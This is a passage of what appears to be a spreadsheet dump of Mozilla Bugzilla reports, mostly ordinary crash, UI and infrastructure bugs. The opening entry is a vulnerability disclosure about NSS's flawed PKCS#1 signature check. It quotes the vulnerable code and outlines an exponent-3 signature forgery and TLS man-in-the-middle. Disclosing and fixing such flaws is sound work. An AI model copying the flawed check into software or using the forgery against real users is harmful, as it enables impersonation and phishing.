        if (buffer[i] != 0xff)
            goto loser
    }
    /*
     * make sure we get the same results
     */
    if (PORT_Memcmp(buffer + modulus_len - hash_len hash hash_len) != 0)
        goto loser
This code runs over the PKCS#1 padding but would accept an early 0
byte so that a padding of
          00 || 01 || 00 || g || hash
with any garbage in g provided g is long enough to put the hash into
the correct place for the following memcmp. A word of acknowledgement is
due here this code was independently found by Hal Finney however the
consequences seem not be known to him (see
http://www.mail-archive.com/cryptography@metzdowd.com/msg06693.html)
Producing a fake signature i.e. a non-signature that is nevertheless
accepted by this code is rather easy when an RSA exponent 3 is used for
usual key lengths (potentially also some larger exponents with longer
keys) as the unchecked part provides enough play ground for an
adversary. If you are interested I could provide some more detail here
on the mathematics. The key point is that with exponent 3 you can use
computing 3rd roots over the real numbers not modulo N the RSA
modulus. The former is easy while the hardness of the latter is the
usual security assumption for RSA.
So basically when a certificate uses exponent 3 we can produce a fake
signature that is accepted by this code.
Here is how to exploit that. The function RSA_CheckSign() is called
during SSL/TLS connection setup when the server sends a
serverkeyexchange message. This message contains new keys to be used by
the client for exchange of the premaster secret. The keys are signed by
the key in the server certificate. For validation the firefox client
computes the md5||sha1 combined hash of the key parameters (plus the
public random bytes) and checks that against the signature of the
server using the RSA_CheckSign() function.
So a man-in-the-middle attack is easy when a site uses a certificate
containing an RSA key with exponent 3: the adversary sends the
certificate (he does not have the private key!) and then also sends a
serverkeyexchange message containing the fake signature. This can
easily be produced only the computation is quick.
So basically the certificate chain can be exploited to make the client
believe it is connected to the original server while it is not.
Phishing etc. is easy now.
If you have any further questions please do not hesitate to contact me.
Attached you will find my gpg key and a diff of the relevant portion of
1.5.0.7 against 2.0b1 which fixes the problem. Please seriously consider
providing a patch for 1.5.0.7.
With best regards
Ulrich Kuehn</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-352812</t>
  </si>
  <si>
    <t>[404] link to http://www.mozilla.org/projects/seamonkey/releases/seamonkey1.0.5/installation.html</t>
  </si>
  <si>
    <t>The system requirements page for SeaMonkey 1.0.5 returns a 404 error.</t>
  </si>
  <si>
    <t>stegozor</t>
  </si>
  <si>
    <t>CALENDAR-417585</t>
  </si>
  <si>
    <t>Find Event toolbar button doesn't restore collapsed unifinder</t>
  </si>
  <si>
    <t>Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.1.13pre) Gecko/2008021321 Calendar/0.8pre
Steps to Reproduce:
1. Enable the unifinder using the Find Event toolbar button
2. Grab the lower border and drag it upwards until the unifinder collapses
3. Disable and enable the unifinder using the Find Event toolbar button
Actual results:
Only the small border that indicates the collapsed unifinder is hidden/show when using the toolbar button. The unifinder itself stays collapsed and is therefore not visible.
Expected results:
To avoid user confusion I suggest that the Find Event toolbar button should also restore the unifinder from collapsed to normal state.</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS-789804</t>
  </si>
  <si>
    <t>talos-r3-xp-015 problem tracking</t>
  </si>
  <si>
    <t>https://secure.pub.build.mozilla.org/buildapi/recent/talos-r3-xp-015 - hasn't taken a job since August 31st.</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS_GRAVEYARD-482399</t>
  </si>
  <si>
    <t>Add new maintenance scripts to mradm02 cron</t>
  </si>
  <si>
    <t>Please add the following cron jobs to dm-stats01 for AMO:
103050 * * * * root cd /data/php5/www/addons.mozilla.org-remora/bin  php -f maintenance.php addons_collections_total
103050 * * * * root cd /data/php5/www/addons.mozilla.org-remora/bin  php -f maintenance.php collections_total</t>
  </si>
  <si>
    <t>CORE-109831</t>
  </si>
  <si>
    <t>DispatchNewEvent cannot occur on anonymous content</t>
  </si>
  <si>
    <t xml:space="preserve">
The following code creates an event where the target ends up being the
 when we really want it to be the individual  element that
makes up that particular color cell.
         &lt;![CDATA[
           if (this.isColorCell(aCell)) {
             this.resetHover()
             aCell.setAttribute(hover true)
             this.mHoverCell = aCell
+            var event = document.createEvent('Events')
+            event.initEvent('DOMMenuItemActive' false true)
+            aCell.dispatchEvent(event)
           }
         ]]&gt;
The screwed up sequence:
nsEventStateManager::DispatchNewEvent() calls
target-&gt;HandleDOMEvent(mPresContext innerEvent &amp;aEvent NS_EVENT_FLAG_INIT
nsXULElement::HandleDOMEvent() subsequently runs the following lines which
clear the old event and it's target:
    nsIDOMEvent* domEvent = nsnull
    if (NS_EVENT_FLAG_INIT &amp; aFlags) {
        aDOMEvent = 
Eventually as the event bubbles up it is retargeted but never to the correct
original target.
If we call HandleDOMEvent without the NS_EVENT_FLAG_INIT everything works - but
I'm not sure what side effects that has with freeing memory.
Why is the target set and then subsequently cleared and not reset?</t>
  </si>
  <si>
    <t>CORE-417642</t>
  </si>
  <si>
    <t>Firefox leak in combination with Firebug</t>
  </si>
  <si>
    <t>Created attachment 303427
leak log1 - with firebug
Mozilla/5.0 (Macintosh U Intel Mac OS X 10.5 en-US rv:1.9b4pre) Gecko/2008021417 Firefox/3.0b4pre
This leak is a combination of a known leak (Bug 416175) and Firefox.
Steps to reproduce:
- New Profile
- Install Firebug Beta from http://fireclipse.xucia.com/#Downloads
- Restart Firefox to enable this extension
- Make sure you have at least 3 tabs open 
-- in my testcase - the default Firefox Startpage Google Maps and  bugzilla.mozilla.org
- Close Firefox with the focus on the bugzilla tab
--&gt; Leak
 0 TOTAL                                          30      148   591142        4 ( 1757.95 +/-  1938.01)  2025711        4 ( 1815.44 +/-  3204.51)
now its leaking nsStringBuffer nsThread nsTimerImpl see leak log1
When you have Firebug not installed its leaking only nsStringbuffer because of Bug 416175 (leak log 2)
   0 TOTAL                                          30       16   557569        2 ( 1472.65 +/-  1611.40)  1731444        2 ( 1577.16 +/-  2723.31)</t>
  </si>
  <si>
    <t>CORE-172393</t>
  </si>
  <si>
    <t>Universal charset detector should accept JIS C 6200 in iso-2022-jp</t>
  </si>
  <si>
    <t>The universal charset detector fails to recognize the attached test case.  The
reason it fails is that the test case contains the escape sequence ESC ( I
which selects JIS C 6200-1969 apparently a single-width Katakana set and
definitely not permitted by the ISO-2022-JP standard.  The Mozilla ISO-2022-JP
converter however appears to support converting it to Unicode.
It would make sense to add support for this escape sequence to the ISO-2022-JP
detector table.  It should at least keep from going into the error state when it
gets this sequence.</t>
  </si>
  <si>
    <t>SEAMONKEY-220103</t>
  </si>
  <si>
    <t>@mozilla.org/download1 uses null mInner</t>
  </si>
  <si>
    <t>Create @mozilla.org/download1 in xpcshell discover interfaces using
instanceof or queryinterface. then interogate properties.
many properties will crash since mInner is null</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-420866</t>
  </si>
  <si>
    <t>remove future dated entry from planet</t>
  </si>
  <si>
    <t>my entry on planet
Firefox 3 with Profile-Guided Optimization = Speeding ticket
dated
April 02 2008
is clearly wrong
I've corrected my feed but the entry is still shown at planet</t>
  </si>
  <si>
    <t>SEAMONKEY-475509</t>
  </si>
  <si>
    <t>MailNews: General</t>
  </si>
  <si>
    <t>Go -&gt; Local Folders -&gt; Outbox does not have custom icon</t>
  </si>
  <si>
    <t>Although the Outbox has a custom icon when displayed in the folder tree the Go submenu only has a plain icon.</t>
  </si>
  <si>
    <t>ewong</t>
  </si>
  <si>
    <t>CORE-189811</t>
  </si>
  <si>
    <t>JS Component Registration leaks atoms</t>
  </si>
  <si>
    <t xml:space="preserve">Ok so I noticed that running xpcshell after a full build resulted in something
like this:
JS engine warning: 1 atoms remain after destroying the JSRuntime.
                   These atoms may point to freed memory. Things reachable
                   through them have not been finalized.
but running it again after running xpcshell didn't give that output.
My guess was that the problem was js components but i wasn't sure so my first
check was of non components and my second was of js components (I was going to
check c++ components last but i didn't need to).
Here's what I ran:
I:\build\mozilla\debug-i686-pc-cygwin\dist\bin&gt;echo quit() &gt; quit.js
I:\build\mozilla\debug-i686-pc-cygwin\dist\bin&gt;for %a in (components\*.js)  do
@(echo %a &amp;&amp; touch %a &amp;&amp; xpcshell quit.js)
Expected output is:
components\
Type Manifest File:
I:\build\mozilla\debug-i686-pc-cygwin\dist\bin\components\xpti.dat
+++ JavaScript debugging hooks installed.
nsNativeComponentLoader: autoregistering begins.
nsNativeComponentLoader: autoregistering succeeded
*** Registering 
nNCL: registering deferred (0)
+++ JavaScript debuging hooks removed.
</t>
  </si>
  <si>
    <t>NSS-487150</t>
  </si>
  <si>
    <t>Removal request of StartCom 1024 bit CA root</t>
  </si>
  <si>
    <t>As the representative of StartCom I request hereby the removal of the StartCom CA root which was added to NSS in bug 338552. Removal may be performed at any time during the period from the first of June 2009 (2009-06-01) and the thirty-first of December 2009 (2009-12-31) but no later.
The root with the common name Free SSL Certification Authority has a RSA key size of only 1024 bit and uses Netscape extensions which are not commonly used anymore. StartCom has successfully transitioned all its CA business to a newer root which is also included in NSS and doesn't need this root to be supported by Mozilla anymore. The root should not be disabled but removed in order to allow previous subscribers to import the root for their convenience (for example for the reading of previously encrypted email messages).
I'd appreciate coordination and confirmation of the removal in order to avoid any mistakes during this process (as not to remove the wrong root).</t>
  </si>
  <si>
    <t>eddy_nigg</t>
  </si>
  <si>
    <t>SEAMONKEY-162127</t>
  </si>
  <si>
    <t>Startup time doubled</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (Macintosh U PPC Mac OS X en-US rv:1.1b) Gecko/20020730
BuildID:    2002073008
I just started noticing that Mozilla's startup time has doubled since previous
night builds in July or before. Might have to due to the fact that page layout
loading time also increased greatly along with other things in Fizzilla.
Reproducible: Always
Steps to Reproduce:
1.Start Mozilla in OSX 10.1.5
2.Time it
3.Compare to earlier build in early July or before.
Actual Results:  Startup time has doubled.
Expected Results:  Startup time to be less or at least returned to previous
speed as in earlier july builds or before that.
Related? Bug 161481  Bug 161766</t>
  </si>
  <si>
    <t>darkelipse55</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-496260</t>
  </si>
  <si>
    <t>SeaMicro cluster: node bm-micro-14 is not responding to ssh</t>
  </si>
  <si>
    <t>deinspanjer</t>
  </si>
  <si>
    <t>CORE-272294</t>
  </si>
  <si>
    <t>xpcshell needs to use loader-style backstage pass</t>
  </si>
  <si>
    <t>If using nested functions which are cloned in response to a callback (executed
on the JS Component manager's context perhaps) try to access native properties
they are currently rewarded with an NS_ERROR_FAILURE because the real
security manager looks up the scope and finds nothing to tell it what the
principal is.
Please find attached (shortly) a patch to move the loader's BackstagePass into
the runtime service and using it from xpcshell as well.</t>
  </si>
  <si>
    <t>CORE-294922</t>
  </si>
  <si>
    <t>Tab Titles are not updated</t>
  </si>
  <si>
    <t>Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8b2) Gecko/20050520
Firefox/1.0+ ID:2005052007
1. Open tab
Title of tab shows (untitled) or loading...
Regression from bug 281988</t>
  </si>
  <si>
    <t>dbradley</t>
  </si>
  <si>
    <t>jaime.bugzilla</t>
  </si>
  <si>
    <t>CORE-450178</t>
  </si>
  <si>
    <t>Create generic 8-bit alpha box blur in thebes</t>
  </si>
  <si>
    <t>Created attachment 333303
ver 1
Layout has a box blur class for use with shadows. Canvas also has use for such a class (for shadows) so the box blur should be generalized and placed in a location more easily accessible. This is primarily a graphics operation and placing it in thebes puts it in a better location to take advantage of any future graphics optimizations.
This patch creates a general box blur class gfxAlphaBoxBlur and then implements nsContextBoxBlur using gfxAlphaBoxBlur as a back end. nsContextBoxBlur cannot be eliminated entirely since it makes a few more optimizations to ensure correctness that canvas cannot make. Canvas will use gfxAlphaBoxBlur directly.</t>
  </si>
  <si>
    <t>zantifon</t>
  </si>
  <si>
    <t>FIREFOX-309481</t>
  </si>
  <si>
    <t>Some files not tagged in FIREFOX_1_0_7_RELEASE</t>
  </si>
  <si>
    <t>It seems some files were not tagged with FIREFOX_1_0_7_RELEASE for example see
http://bonsai.mozilla.org/cvsgraph.cgi?file=mozilla/profile/Makefile.in Version
1.12. All other Firefox 1.0.x and Mozilla 1.7.x releases are listed there but
FF 1.0.7 is not. This should be fixed so people can build FF 1.0.7 from CVS.</t>
  </si>
  <si>
    <t>CORE-480324</t>
  </si>
  <si>
    <t>Link state detection on Mac OS X not working (offline auto detect)</t>
  </si>
  <si>
    <t>Created attachment 364325
The fix
+++ This bug was initially created as a clone of Bug #474345 +++
(separated out to avoid bug confusion).
Thunderbird's automatic offline/online detection isn't working for me on nightly builds. I've since done some more testing and found Firefox doesn't work either.
Mozilla/5.0 (Macintosh U Intel Mac OS X 10.5 en-US rv:1.9.1b3pre) Gecko/20090118 Shiretoko/3.1b3pre Ubiquity/0.1.4
Mozilla/5.0 (Macintosh U Intel Mac OS X 10.5 en-US rv:1.9.1b3pre) Gecko/20090119 Lightning/1.0pre Shredder/3.0b2pre
This is on a Mac Book running 10.5.6.
What I did to double check:
1) Enter the following line into the error console with networking available and select evaluate:
Components.classes[@mozilla.org/network/network-link-service1].getService(Components.interfaces.nsINetworkLinkService).isLinkUp
=&gt; Returns: true.
2) Go offline on your mac interfaces (disable select offline mode etc) and evaluate the line again
=&gt; Returns: true (expected: false)
If I replace isLinkUp with linkStatusKnown and try again this returns false in the offline case true in the online case.
In debugging I have looked at the values returned from ::SCNetworkReachabilityGetFlags here in nsNetworkLinkService::UpdateReachability:
http://hg.mozilla.org/mozilla-central/annotate/d3ce1f2c44bb/netwerk/system/mac/nsNetworkLinkService.mm#l177
Flag values are as follows:
Online (wireless): 65538
Online (ethernet): 65538
Offline (all interfaces disabled): 0
The documentation at http://developer.apple.com/documentation/Networking/Reference/SysConfig/SCNetwork/CompositePage.html#//apple_ref/c/tag/SCNetworkConnectionFlags indicates to me that a value of 0 implies that the connection just isn't available and there's no automated options to get it back (which in my case is correct as I've explicitly disabled all connections).
The attached patch is one that dcamp suggested and I have tested it and it works for me. No testcase possible as this is an OS interaction item.
Dave can you look at this and point me to other reviewers as necessary?</t>
  </si>
  <si>
    <t>MOZILLA.ORG-77580</t>
  </si>
  <si>
    <t>CVS Commit Access for Kenton Hanson</t>
  </si>
  <si>
    <t>Kenton is a new-hire in the JavaScript Engine component.
His manager is Patrick Beard (beard@netscape.com). 
I am cc'ing Patrick as a voucher for Kenton per the instructions
at http://www.mozilla.org/hacking/getting-cvs-write-access.html.
As indicated there Patrick should add a comment to this bug: 
2. When you have a voucher ask that person to add a comment to the bug 
   saying s/he's vouching.
Patrick will also know whether super-review approval is necessary or not:
3. Determine whether or not you need super-reviewer approval...
4. If not note in the bug why super-reviewer approval is not needed.</t>
  </si>
  <si>
    <t>MARKETING-676652</t>
  </si>
  <si>
    <t>[Email Acquisition - Design] - Thanks for Choosing Firefox</t>
  </si>
  <si>
    <t>Created attachment 550811
Download page
Weâ€™d like to add a prominent email opt-in CTA above the installation instructions.  
It could be a permanent element or an overlay that appears.  I think we're leaning towards adjusting the page layout rather than an overlay.  Whatever form it takes there should be a way to X off of the opt-in and push the instructions for installation back up to the top of the page.  
It should be a form they can fill out similar to how one would opt-in if doing so on the footer of the site.  
Get Firefox Tips and Tricks 
Love Firefox? Get in on the action by signing up for our monthly email newsletter. 
(Email Address)
Once they fill out email address they hit submit button and a drop down appears requesting more info:
(Country)
HTML  Text  
()I agree to the Privacy Policy 
(SIGN ME UP)
We will only send you Mozilla-related information. 
Page URL:  http://www.mozilla.com/en-US/products/download.html 
Timing on this is ASAP.</t>
  </si>
  <si>
    <t>ltom</t>
  </si>
  <si>
    <t>wbowden</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS_GRAVEYARD-495441</t>
  </si>
  <si>
    <t>PyXPCOM</t>
  </si>
  <si>
    <t>pyxpcom chokes on NULL pointers as out params</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9.0.10) Gecko/2009042523 Ubuntu/8.10 (intrepid) Firefox/3.0.10
Build Identifier: mozilla hg changeset 28829:bb4148c7ff61
This is a problem because C++ code in mozilla calls methods that can be implemented in python passing NULL to the params it's not interested in. The C++ side expects that the call will succeed and that the non-null params will be correctly populated. Instead it's aborting with an error:
NS_ABORT_IF_FALSE(pi-&gt;IsDipper() || ns_v.val.p No space for result!)
An example of this situation is when the implementation of nsDocShellTreeOwner::GetSize calls ownerWin-&gt;GetDimensions passing nsnull for the position arguments.
Reproducible: Always</t>
  </si>
  <si>
    <t>CALENDAR-285892</t>
  </si>
  <si>
    <t>events disappear from week view when also showing other calendar containing invalid event [end before start]</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.7.6) Gecko/20050301 Firefox/1.0.1 (Debian package 1.0.1-1)
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.7.6) Gecko/20050301 Firefox/1.0.1 (Debian package 1.0.1-1)
When using multiple calendars if one of the calendar has a buggy event that has
a  start-date which is after the end-date in the week view the events of the
other calendars after the start-date of the buggy event disappear.
This bug is deprecated since that code is being rewritten in trunk anyway. I
just figured i'd note it here to clarify this to others who might run into this bug.
Reproducible: Always
Steps to Reproduce:
1. subscribe to http://www.bzzt.net/~arnouten/sunbirdbug/sunbird.ics
2. go to week 14 in the week view
3. subscribe to http://www.bzzt.net/~arnouten/sunbirdbug/thalia-ical.ics
Now the events on thursday friday and saturday disappear. Uncheck the
thalia-ical calendar in `Calendars' and they re-appear.
Actual Results:  
the events on thursday friday and saturday disappear
Expected Results:  
not sure but those events shouldn't disappear that's for sure :)
Sunbird 0.2</t>
  </si>
  <si>
    <t>mozillabugzilla</t>
  </si>
  <si>
    <t>SEAMONKEY-387271</t>
  </si>
  <si>
    <t>Newsgroups list is reloaded every time (hostinfo.dat isn't loaded)</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O de rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.9a7pre) Gecko/200707072121 SeaMonkey/2.0a1pre
The newsgroups list is reloaded every time when opening the subscribe dialog cause the hostinfo.dat isn't loaded.
nsNntpIncomingServer::LoadHostInfoFile() loads the wrong file mNewsrcFilePath instead of mHostInfoFile and every time after reading a line mHasSeenBeginGroups is set back to PR_FALSE.
Reproducible: Always</t>
  </si>
  <si>
    <t>CORE-449291</t>
  </si>
  <si>
    <t>In  multiple warning C4309: 'initializing' : truncation of constant value</t>
  </si>
  <si>
    <t>[Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.9.1a2pre) Gecko/2008080519 SeaMonkey/2.0a1pre] (home optim default) (W2Ksp4)
{{
.../xpcom/tests/TestEncoding.cpp(61) : warning C4309: 'initializing' : truncation of constant value
.../xpcom/tests/TestEncoding.cpp(61) : warning C4309: 'initializing' : truncation of constant value
.../xpcom/tests/TestEncoding.cpp(61) : warning C4309: 'initializing' : truncation of constant value
.../xpcom/tests/TestEncoding.cpp(61) : warning C4309: 'initializing' : truncation of constant value
.../xpcom/tests/TestEncoding.cpp(105) : warning C4309: 'initializing' : truncation of constant value
.../xpcom/tests/TestEncoding.cpp(105) : warning C4309: 'initializing' : truncation of constant value
.../xpcom/tests/TestEncoding.cpp(105) : warning C4309: 'initializing' : truncation of constant value
.../xpcom/tests/TestEncoding.cpp(105) : warning C4309: 'initializing' : truncation of constant value
.../xpcom/tests/TestEncoding.cpp(105) : warning C4309: 'initializing' : truncation of constant value
.../xpcom/tests/TestEncoding.cpp(105) : warning C4309: 'initializing' : truncation of constant value
.../xpcom/tests/TestEncoding.cpp(148) : warning C4309: 'initializing' : truncation of constant value
.../xpcom/tests/TestEncoding.cpp(148) : warning C4309: 'initializing' : truncation of constant value
.../xpcom/tests/TestEncoding.cpp(148) : warning C4309: 'initializing' : truncation of constant value
.../xpcom/tests/TestEncoding.cpp(191) : warning C4309: 'initializing' : truncation of constant value
.../xpcom/tests/TestEncoding.cpp(191) : warning C4309: 'initializing' : truncation of constant value
.../xpcom/tests/TestEncoding.cpp(191) : warning C4309: 'initializing' : truncation of constant value
}}
Clean up the output.</t>
  </si>
  <si>
    <t>CORE-140609</t>
  </si>
  <si>
    <t>[PATCH] navigating menu bar with arrows is reversed when UI aligned to the right</t>
  </si>
  <si>
    <t>build ID: 2002041711 (Mozilla/5.0 (Windows U Win98 en-US rv:1.0rc1)
Gecko/20020417)
Description: when the interface is aligned to the right e.g. when using a RTL
language (like hebrew or arabic) navigating the menues in the main menu of any
component of Mozilla (Navigator Messenger etc.) is reversed. pressing the right
arrow on the keyboard moves to the next menu to the left and pressing the left
arrow on the keyboard moves to the next menu to the right. this is also true in
sub menues.
Steps to reproduce:
1. aligning the interface to the right: add these lines to the file intl.css in
the locale\en-US\global in the en-US.jar file (the language pack file in the
chrome folder):
windowdialogwizardpage {
  direction: rtl
}
menu { direction: rtl }
outliner { direction: rtl }
2. start mozilla
3. open one of the menus either with the mouse or by pressing the Alt key (on
Windows) once.
4. press the right arrow on the keyboard
Actual Results: the menu to the left of the current one becomes active.
Expected Results: the menu to the right of the current one should become active.</t>
  </si>
  <si>
    <t>TOOLKIT-427364</t>
  </si>
  <si>
    <t>phishing warning not shown if phishing page is in a frame (CVE-2007-1736)</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 it rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 it rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13
if you report google.com as pishing and then open a window with a frame containing google.com. the form page not show the pishing alert.
Reproducible: Always
Steps to Reproduce:
create a new page containing a pishing side in a form.
showld be confidential because the hackers can make pages that contains frames unsigned as pishing</t>
  </si>
  <si>
    <t>86marius86</t>
  </si>
  <si>
    <t>CALENDAR-475170</t>
  </si>
  <si>
    <t>LDAP Lookup broken in Invite Attendees dialog</t>
  </si>
  <si>
    <t>I've just realised that LDAP lookup is broken in the Invite Attendees dialog. This regressed at the time of the password manager switch (well just before).
I know what the fix is will do a patch later.</t>
  </si>
  <si>
    <t>CORE-366285</t>
  </si>
  <si>
    <t>Need a common class of the fontconfig management for Linux and BeOS</t>
  </si>
  <si>
    <t>We have a very many duplicated code in gfxPlatformGtk and gfxBeOSPlatform. The duplicated code is accessing to fontconfig. So we can create the common super class for gfxPlatformGtk and gfxBeOSPlatform.</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS-448601</t>
  </si>
  <si>
    <t>WINNT 5.2 mozilla-central qm-win2k3-03 dep unit test loves itself some red</t>
  </si>
  <si>
    <t>WINNT 5.2 mozilla-central qm-win2k3-03 dep unit test went red a couple of cycles ago. The log makes it seem like a machine issue.
Perhaps related WINNT 5.2 mozilla-central build is off and on red as of a few cycles ago. (I can file a separate bug for that if needed.)</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-453205</t>
  </si>
  <si>
    <t>footer in new design is far too tall</t>
  </si>
  <si>
    <t>The footer in the new design is really big (several hundred px tall).  We should put something useful in it and make it way shorter.</t>
  </si>
  <si>
    <t>SOCORRO-704480</t>
  </si>
  <si>
    <t>Move versions_info to new-style middleware service</t>
  </si>
  <si>
    <t>The /util/versions_info/ service from the middleware is pretty small and will consequently be the first to be moved to our new service's style. No change from the webapp only restructuring the internal code in the middleware.</t>
  </si>
  <si>
    <t>DIRECTORY-139535</t>
  </si>
  <si>
    <t>LDAP Tools</t>
  </si>
  <si>
    <t>ldapsearch: filter patterns that contain %* cause crash</t>
  </si>
  <si>
    <t>An ldapsearch command that contains a filter pattern with %* in it crashes.
ldapsearch -M -D cn=directory manager -w secret12 -b o=example.com cn=%*
The problem is that we use snprintf(). We need to escape the filter pattern
somehow or decide to just document that the user should use a pattern like cn=%%*.</t>
  </si>
  <si>
    <t>CORE-295301</t>
  </si>
  <si>
    <t>Set the right parent and reuse wrappers in RewrapIfDeepWrapper</t>
  </si>
  <si>
    <t>We should really just be calling our own GetNewOrUsed here instead of calling
our constructor.</t>
  </si>
  <si>
    <t>CORE-38654</t>
  </si>
  <si>
    <t>The cute lion won't show</t>
  </si>
  <si>
    <t>Hi
I am trying out svg with a build from CVS Tue May  9 13:44:45 MET DST 2000
The example.xml in layout/svg/tests looks ok but the cute lion linked on the
SVG page won't show it won't show anything if pointing the lizard to the link.
I tried renaming the file from lion.svg to lion.xml and the title shows.
If I add the namespace given in example.xml it displays a few assorted 
polygons but nothing close to a cute lion.
I will attach screenshot.
Axel</t>
  </si>
  <si>
    <t>DEVELOPER_DOCUMENTATION-403611</t>
  </si>
  <si>
    <t>Update navigator.language to be up-to-par with BCP 47</t>
  </si>
  <si>
    <t>http://tools.ietf.org/html/rfc4646 describes in detail what a language tag is which we use for navigator.language.
That document is pretty involved in what is required (length of subparts) what's recommended (casing) what's allowed and what's standardized elsewhere (like scripts).
Someone with deeper writing skills than me should take a stab at this and try to find the right balance between wrong and overly complex.</t>
  </si>
  <si>
    <t>SEAMONKEY-223539</t>
  </si>
  <si>
    <t>Mail views installs non-existent package</t>
  </si>
  <si>
    <t>@$(REGCHROME_INSTALL) locale en-US/messenger-views en-US.jar
installs locale for messenger-views
but messenger-views uses messenger for its locale
so all this does is confuse chrome registration.</t>
  </si>
  <si>
    <t>THUNDERBIRD-208945</t>
  </si>
  <si>
    <t>HTML-MAIL viewer does not jump to local fragment id's</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.4b) Gecko/20030608 Mozilla Firebird/0.6
Build Identifier: Mozilla Thunderbird 0.1a (20030603-trunk)
Among my news tidbits is the INA service of IHT.COM.  The headlines are all
anchors pointing to a location thus:
mailbox:///G|/HOME/superbiskit/_Mozilla/Superbiskit/********.slt/Mail/cox.net/Inbox?number=21214144#a_47464
Clicking on one should move the view to the cited fragment.
It does not.
Reproducible: Always
Steps to Reproduce:
1. Find or create an HTML-Mail document using internal fragment identifiers
 ( #fragment ).  Mail it to yourself.
2. Click on the referencing anchor.
Actual Results:  
Nothing
Expected Results:  
Jumped (moved focus) to the anchor '...'</t>
  </si>
  <si>
    <t>superbiskit</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-462932</t>
  </si>
  <si>
    <t>setup new sandbox VMs for new personas backend</t>
  </si>
  <si>
    <t>Tracking to move Personas out of Labs and into production.  Need to figure out app requirements and hardware requirements and see if it can live on existing hardware.
oremj == IT lead</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-349850</t>
  </si>
  <si>
    <t>Approval: add ommited entities for default search engine in region.properties</t>
  </si>
  <si>
    <t>In ko version it's not defined default search engine. I added ommited entities for default search engine in region.properties in patch.</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-182570</t>
  </si>
  <si>
    <t>Wrong font when pasting into empty location bar</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X en-US rv:1.0.1) Gecko/20021104 Chimera/0.6
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X en-US rv:1.0.1) Gecko/20021104 Chimera/0.6
When a the URL bar is empty and text is pasted into it it is displayed in the
wrong typeface.  (Helvetica?)  The font is then set to whichever Lucida variant
is appropriate when Return is pressed or something else resets the URL bar.
This only happens when pasting into an empty location bar.
Reproducible: Always
Steps to Reproduce:
Copy some text to the clipboard
Click in URL bar
Press Command-A (Select All)
Press Delete
Press Command-V (Paste)
[look at text]
Press Return
Actual Results:  
The freshly pasted text is displayed in the wrong typeface (Helvetica?) and then
switched to the proper typeface when Return was pressed.
Expected Results:  
The format of the location bar text should not change.  It should always be
displayed using the proper typeface.
0.6+-2002112805/10.2.2
0.6-2002110415/10.2.2</t>
  </si>
  <si>
    <t>CORE-23049</t>
  </si>
  <si>
    <t>pressing arrow key (key repeat) doesn't work in tree widget</t>
  </si>
  <si>
    <t>Go to a tree widget and make a selection.  Press and hold the down arrow (or up
arrow) so that key repeat mode is invoked.  Notice that the selection moves up
or down once but doesn't continue to move the selection.  I expect that the
selection will keep moving until the key is released or I am at the top/bottom.
in mozilla/layout/xul/base/src/nsTreeFrame.cpp in nsTreeFrame::HandleEvent I
see that the selection is changed based on the key *down* event (line 283).
What should happen is the key *press* event should be checked.  This will allow
key repeat to work as expected.</t>
  </si>
  <si>
    <t>CLOUD_SERVICES-450475</t>
  </si>
  <si>
    <t>Data privacy is missing</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9.0.1) Gecko/2008072820 Firefox/3.0.1
Build Identifier: 
Information about how data is handled on the Mozilla servers are not answered for and should be accounted fast. 
People could start thinking the data they upload in the cloud is licensed with GPL or MPL for Mozilla licenses. 
Copied from chrome://weave/content/ToS.xhtml
4.	Privacy and Your Personal Information. For information about Mozilla's data protection practices please read Mozilla Weave Privacy Policy at http://labs.mozilla.com/projects/weave/privacy.html. This policy explains in detail how Mozilla treats your personal information and protects your privacy when you use the Weave Services.
Reproducible: Always
Steps to Reproduce:
1. Open the link
2. See the data privacy is missing.</t>
  </si>
  <si>
    <t>CORE-392335</t>
  </si>
  <si>
    <t>Crash [@ nsFrame::Destroy] when zooming text [@ DocumentViewerImpl::SetTextZoom]</t>
  </si>
  <si>
    <t>Crash [@ nsFrame::Destroy] when zooming text.
STEPS TO REPRODUCE
1. load URL (or any of the other URLs listed in the crash reports below)
2. press CTRL and use the mouse wheel to zoom the text up/down
3. every now and then type CTRL+R to cause a Reload (10 sec interval perhaps)
   continue zooming while the page loads
ACTUAL RESULT
I was able to reproduce it in Firefox trunk on Linux twice within
10 minutes of trying.
Crash reports with SetTextZoom on the stack in the past 3 months:
http://crash-stats.mozilla.com/?do_query=1&amp;query_search=stack&amp;query_type=contains&amp;query=SetTextZoom&amp;date=&amp;range_value=3&amp;range_unit=months
